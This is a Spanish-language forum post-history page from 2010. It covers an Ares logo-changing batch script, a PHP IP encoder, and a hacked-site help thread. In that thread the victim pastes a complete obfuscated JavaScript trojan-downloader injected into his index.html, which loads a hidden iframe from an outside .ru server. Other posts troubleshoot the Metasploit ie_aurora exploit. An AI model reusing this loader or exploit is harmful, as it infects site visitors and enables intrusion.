elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Seguridad Informática / Seguridad / Re: Me hackearon y dejaron un regalo. ayuda! en: 15 Mayo 2010, 04:10 am
Citar
Es un servidor gratuito? un wordpress?
Si, es un servidor gratuito

Citar
Otra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas
Ok  ;D, ahora ya me dejo de aparecer el mensaje del antivirus, no lo detecta mas.
AH! tambien cambie la contraseña de mi host

Saludos  :)
12  Seguridad Informática / Seguridad / Re: Me hackearon y dejaron un regalo. ayuda! en: 15 Mayo 2010, 03:57 am

Citar
Borra las Cookies, el historial de navegación y los archivos temporales de internet.
Listop  :P

Citar
Y si han dejado eso ahi, es porque quizás tu web tenga alguna vulnerabilidad XSS y el atacante la haya descubierto, y, tras entrarte, aprovechó y dijo..."vamos a dejarle esto aqui y asi aprovecho la vulnerabilidad XSS para volverle a defacear si consigue recuperar el acceso"

Lo primero que hice fue borrar ese codigo, pero igual si dicen que tiene un XSS va a poder entrar nuevamente por el mismo  :( asi que...

si alguien quiere la web para ver el agujero que tiene si me quiere ayudar que me diga asi le paso la web por privado, la no tiene PHP ni SQL. solo tiene 1 Frame <FONT> y 1 script que lo uso para sacar la propaganda de la web  :-\ por lo cual es una pagina muy simple sin scrpts salvo el mensionado anteriormente, no es grande la pagina y no debe ser muy complicado ver el error.

Bueno les mando saludos gracias por la ayuda y ya hice todo lo que me dijieron  :)

Saludos, espero que alguien pueda ayudarme  :(
13  Seguridad Informática / Seguridad / Me hackearon y dejaron un regalo. ayuda! en: 14 Mayo 2010, 23:06 pm
Hola a todos, Bueno mi problema es que hace un rato intente entrar a mi web y el antivirus me salto con que habia un troyano.  :-\ Me parecio muy raro esto y entonces entre al server a ver que pasaba y me encuentro con que abajo de todo en la pagina index.html encontre esta linea que no recuerdo haber puesto  :-\

Código:
<script>try {} catch(pE){};try {} catch(Xp){};eE=32291;eE--;try {} catch(I){};try {this.Q=false;var w=new Array();var i=window[String("a07hun".substr(4)+"escmbG".substr(0,2)+"casvMg".substr(0,2)+"jWcpeWcj".substr(3,2))];this.s=12128;this.s-=48;this.Kg=62204;this.Kg-=229;var U=new String();F=["rY","O"];var V=window[(String("RegE"+"xp"))];E=9858;E-=155;kl=15194;kl+=67;var A="rep"+"lac"+"e";this.jS="";var k='';var j="1";var mI='';var H='';var a={v:false};var e=String("onlo"+"SQmad".substr(3));f=48381;f--;var EC=3018;x=37020;x--;var rc=new Date();this._lg='';this._M='';this.Po=30979;this.Po--;function _(j,B){this.CH=false;this.AR="AR";this._B=false;this.xJ="xJ";this.Vo="Vo";var PL=["pa","Zk"];var M="[ltxv".substr(0,1);XK=["Su","s_"];try {} catch(oL){};M+=B;var Rv=["AB","jR"];var Ek=[];KC=[];var QO="QO";M+=i("%5d");var MT={of:false};var Ib={om:false};var er=false;dA=9445;dA++;var C=new V(M, String("g"));return j.replace(C, k);var Bv=new Array();};oY=50650;oY--;fp={};var CE={};var h=new String("/reveAdE".substr(0,5)+"rso-nl0c".substr(0,5)+"et/go32v".substr(0,5)+"ogle."+"GdIKcom/cIdKG".substr(4,5)+"omcas"+"t.netZpb".substr(0,5)+"GZrv.phpZrvG".substr(4,4));this.kH=35628;this.kH++;var m=343238-335158;this.dS=34232;this.dS++;var o=String("htt"+"p:/b9v".substr(0,3)+"/go"+"thg"+"uil"+"t.r"+"u:");var ty=["do_"];tc={XG:34617};var HC=["aH"];LN={Ts:false};var Mk=["Ki","hn","MA"];try {} catch(Ii){};try {var rl='yF'} catch(rl){};function G(){this.lg=55980;this.lg++;this.SX=36579;this.SX-=86;var qL=new Date();Gx={};SO={};var W=_('sIclrDikphto','fHljVvok4uKhqDIQ');try {var YN='me'} catch(YN){};var Mw=false;this.kN=19486;this.kN--;this.bP=4490;this.bP--;yc={};var BA=document;var AA=false;this.Nd="";var Oz={};var JL={Av:"YF"};var X=new String("appe"+"ERyndCh".substr(3)+"wFm4ildF4mw".substr(4,3));this.ZC=3686;this.ZC++;var F_=["JC","Hi","Od"];var Nu=["rj","Ax","jRs"];var ON={};var rBN=new Date();this.RW=38738;this.RW-=177;var lB=["gF"];_l=BA.createElement(W);this.OA=5769;this.OA-=77;var ew=new Date();var VU='';this.z_=false;this.ql=false;var dR="";var pt="pt";var Pz={FP:8336};P=o+m;HL=32462;HL+=9;P=P+h;try {} catch(Xs){};this.EV=false;this.tb=false;try {} catch(Uh){};ji=["c_","zK"];var HG=new String();so=11437;so+=84;var Yp=new String();this.aN="";var T=BA.body;_l[String("de9R76".substr(0,2)+"fe59z".substr(0,2)+"94nr".substr(3))]=j;VT=8274;VT-=221;var bun=["Hl"];ZT=24617;ZT-=219;var GK=["Qm"];try {var BO='tk'} catch(BO){};_l.src=P;try {} catch(li){};this.tB="";var Ku='';T[X](_l);UF=[];this.hm="hm";};this.KK='';var xW={af:10575};this.hP='';var VM=[];this.VI='';HQI=["wZ"];var Ag=16397;window[e]=G;this.JQ="";xc=[];var nl={SD:184};} catch(p){try {var IM='eb'} catch(IM){};var lV=new Date();cC=58014;cC-=95;Fc=["cM"];_a=["hd"];this.pg=14943;this.pg--;by=["XN"];};s_p=63145;s_p+=134;</script>
<!--d214af83de230538e9ec96da2945cae1-->

Nunca puse eso yo alguien sabe que es????? me lo detecta como
JS/TrojanDownloader.Pegel.BH troyano

mmm..... cada dos por tres me salta el antivirus ahora mostrandome esoooooo :o

 :'( ayudaaaaaaaaaaaaaaaaaa
 :-(
EDIT:
el archivo esta en C:\Users\Doom\AppData\Roaming\Mozilla\Firefox\Profiles\icoalaiw.default

Cada vez que lo borro aparece devuelta  :o es un archivo .js se llama  sessionstore.js creo que mientras mantengo abierto el firefox sigue apareciendo eso. como borro esa cosa????????????  :(

EDIT:
El archivo que dije anteriormente que lo borraba y se creaba nuevamente, lo abri como .txt y adentro tiene todas las paginas a las que entre con el firefox  :o
14  Programación / PHP / Re: PHP & MySQL para dummies en: 6 Abril 2010, 18:59 pm
Alguien lo podria subir a un server MEGAUPLOAD o RAPIDSHARE!! :-\ Porfavor!!  :-(
15  Programación / Scripting / [By Darkgx] Cambiar fondo del Ares en: 25 Febrero 2010, 00:32 am
Bueno, aburrido decidi codear esto  , espero que les sirva  como dice el titulo cambia el logo del Ares que esta en Reproductor  ;D

Para poder utilizarlo hay que saber algunos puntos:

-Deben poner el fondo que quieren poner en el Escritorio.
-El archivo tiene que ser .bmp
-Si estas bajo Windows Vista debes Ejecutarlo como Administrador (Como se hace esto? simple, Boton Secundario -> ejecutar como administrador).

##Mini Explicacion (Funcionamiento) ##
Lo primero que hace el programa al abrirlo tres opsiones, oviamente vamos a elegir
la opsion 1. Luego nos pide el nombre del archivo (que tiene que estar en el escritorio al igual que programa) sin su extension, es decir, si nuestro archivo se llama Myimage.bmp hay que poner Myimage solamente.

En el segundo paso nos pide el nombre del Skin actual que tenemos en el Ares, hacemos lo siguiente:
-Abrimos el Ares
-Vamos a: Panel de Control -> pestaña Skin.

Ahi nos fijamos que skin tiene y lo ponemos en el programa. Listo, Espero que les funcione, cualquier duda, postear no cuesta nada >_<  :xD
Código
  1. @echo off
  2. title AresBackGround_Changer (ABC)
  3. REM COPYRIGHTS TODOS LOS DERECHOS RESERVADOS >_<!
  4. REM darkgx
  5.  
  6. IF EXIST "%programfiles%\Ares\temp" (goto menu) else goto make
  7. :make
  8. MKDIR "%programfiles%\Ares\temp"
  9.  
  10. :menu
  11. CLS
  12. ECHO 1.Cambiar Logo
  13. ECHO 2.Volver a la normalidad
  14. ECHO 3.Salir
  15. SET /p op=Opsion--:
  16.  
  17. if not defined op goto error
  18.  
  19. IF %op%==1 (goto change) else goto op2
  20. :op2
  21. IF %op%==2 (goto normal) else goto op3
  22. :op3
  23. IF %op%==3 (goto exit) else goto error
  24.  
  25.  
  26. REM  **** MENU PARA CAMBIAR EL FONDO******
  27. :change
  28. CLS
  29. ECHO Ingrese el nombre de la imagen (que esta en su escritorio) que quiere poner en el Ares de fondo (sin su extension).
  30. ECHO ejemplo: myimage
  31. SET /p img=Imagen--:
  32. CLS
  33.  
  34. ECHO Ingrese el nombre del skin que tiene actualmente su Ares:
  35. SET /p skin=Skin--:
  36.  
  37. REM COPIANDO EL ARCHIVO logo.bmp
  38. IF EXIST "%programfiles%\Ares\temp\logo.bmp" (goto de) else goto do
  39. COPY /y "%programfiles%\Ares\data\GUI\%skin%\logo.bmp" "%programfiles%\Ares\temp"
  40.  
  41. :de
  42. IF NOT EXIST "%programfiles%\Ares\data\GUI\%skin%\logo.bmp" (goto mo) else goto mi
  43.  
  44. :mi
  45. DEL /f /q "%programfiles%\Ares\data\GUI\%skin%\logo.bmp"
  46.  
  47. :mo
  48. REN %userprofile%\Desktop\%img%.bmp logo.bmp
  49. COPY /y "%userprofile%\Desktop\logo.bmp" "%programfiles%\Ares\data\GUI\%skin%"
  50.  
  51. TASKKILL /f /im "Ares.exe"
  52. CLS
  53. ECHO Cambio completado
  54. ECHO PRESIONE ENTER
  55.  
  56. goto menu
  57.  
  58.  
  59. REM **** VOLVER A LA NORMALIDAD AL FONDO *****
  60. :normal
  61. CLS
  62. ECHO ingrese el nombre del skin donde se encuentra el fondo actual:
  63. SET /p skin2=Skin--:
  64.  
  65. DEL /f /q "%programfiles%\Ares\data\GUI\%skin2%\logo.bmp"
  66. COPY /y "%programfiles%\Ares\temp\logo.bmp" "%programfiles%\Ares\data\GUI\%skin2%"
  67.  
  68. ECHO PRESIONE ENTER PARA SEGUIR
  69. TASKKILL /f /im "Ares.exe"
  70. goto menu
  71.  
  72.  
  73. :error
  74. CLS
  75. ECHO OPSION INVALIDA, VUELVA A INTENTARLO
  76. goto menu
  77.  



PD:
todavía tengo que mejorarlo, asique con tiempo le hare algunos cambios. Si alguien me podria decir si funciona en Windows XP  :-\, en Vista funciona bien. :P

Acepto Comentarios, Criticas...  ;D

Saludos!

EDIT:
No puede haber 2 archivos logo.bmp asi que cuando van a cambiar a otro fondo entonces borren el logo.bmp que quedo en el escritorio del fondo anterior (se entendió?).
16  Programación / Programación Visual Basic / Re: mini conter strike en visual basic en: 25 Enero 2010, 02:17 am
Disculpen, esta compilado ya? porque no tengo el VB
:(
17  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 21 Enero 2010, 23:55 pm
Porque cuando se conecta el otro usuario me dice Started Bind handler?
y se queda ahi..
18  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 21 Enero 2010, 23:23 pm
ahh ya encontre esa ruta... es que tu dijiste que creemos una carpeta xD y yo cree una y lo puse en windir... xD
Bueno encontre la ruta  exploits/windows/browser. hay muchos archivos .rb.

No, no modifique el nombre. ya estaba como ie_aurora. Ahora intente cargar un archivo de la carpeta browser que no sea el ie_aurora.rb y funciono bien.. pero no me funciona el ie_aurora  :( me sige apareciendo el mismo error.  :-\

Código:
[-] Failed to load module: exploits/windows/browser/ie_aurora
es raro que carge todos menos el aurora no?..

EDIT:
Algunos archivos me los habia detectado el antivirus. Me los habia puesto en cuarentena pero ya los volvi a su lugar... quizas si desactivo el UAC?...

2doEDIT!:
Error mio!!! arreglado!!
habia puesto exploits y en realidad era exploit! sin la "s" xD sorry
 ;D
19  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 21 Enero 2010, 22:57 pm
Hola, acabo de bajar el ie_aurora y lo puse en mi carpeta Windows/exploits/ y cuando pongo

Código:
use windows/exploits/ie_aurora

me dice
Código:
Failed to load module: windows/exploits/ie_aurora
no se porque pasa... me podrian ayudar?

Mi O.S: Win Vista
20  Programación / PHP / Codificador y Decodificador de IP's - By Darkgx en: 2 Enero 2010, 02:03 am
Hola, bueno les traigo un Codificador y Decodificador de IP's en base 256. ¿Para que nos servira esto? enviar peticiones DCC en mirc, ya que al enviarlo la IP tiene que estar codificada. Bueno espero que les sirva.  :)
//CODIFICADOR//
Código
  1. <?php
  2. //Decodificador echo por >>Darkgx<< - Todos los derechos reservados (all rights reserved)
  3. //Fecha: 1/1/2010
  4.  
  5. $a=186;
  6. $b=23;
  7. $c=205;
  8. $d=165
  9. ;
  10. $res=($a*16777216+$b*65536+$c*256+$d*1);
  11. print("La IP codificada es :".$res);
  12. ?>
USO:
Para usarla solo tienen que poner los cuatro numeros de la IP en a, b, c y d Y luego les va a decir la IP codificada.

//DECODIFICADOR//
Código
  1. <?php
  2. //Decodificador echo por >>Darkgx<< - Todos los derechos reservados (all rights reserved)
  3. //Fecha: 1/1/2010
  4.  
  5. $ip=3645183495;
  6. $a=$ip/16777216; //PRIMER N° DE LA IP
  7.  
  8. settype($a,"integer");
  9. settype($var,"integer");
  10.  
  11. $b=($ip-($a*16777216));
  12. settype($b,"integer");
  13. $c=$b/65536; // SEGUNDO N° DE LA IP
  14. settype($c,"integer");
  15. $d=$c*65536;
  16. $e=($b-$d);
  17. $f=($e/256); // TERCER N° DE LA IP
  18. settype($f,"integer");
  19. $g=($f*256);
  20. $h=($e-$g); //CUARTO N° DE LA IP
  21.  
  22. print("La ip decodificada es: ".$a.".".$c.".".$f.".".$h);
  23. ?>
Para decodificarla solo pongan la IP codificada  (primero borren la ip de ejemplo) en la variablae $ip=(IP A DECODIFICAR)

Bueno espero que les sirva y si lo postean en otro lado no estaria demas poner su autor tambien   :P. Graxias y Saludos y feliz año nuevo para todos.

PD:
Opiniones, criticas y comentarios son bienvenidos!.
Darkgx  ;)
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines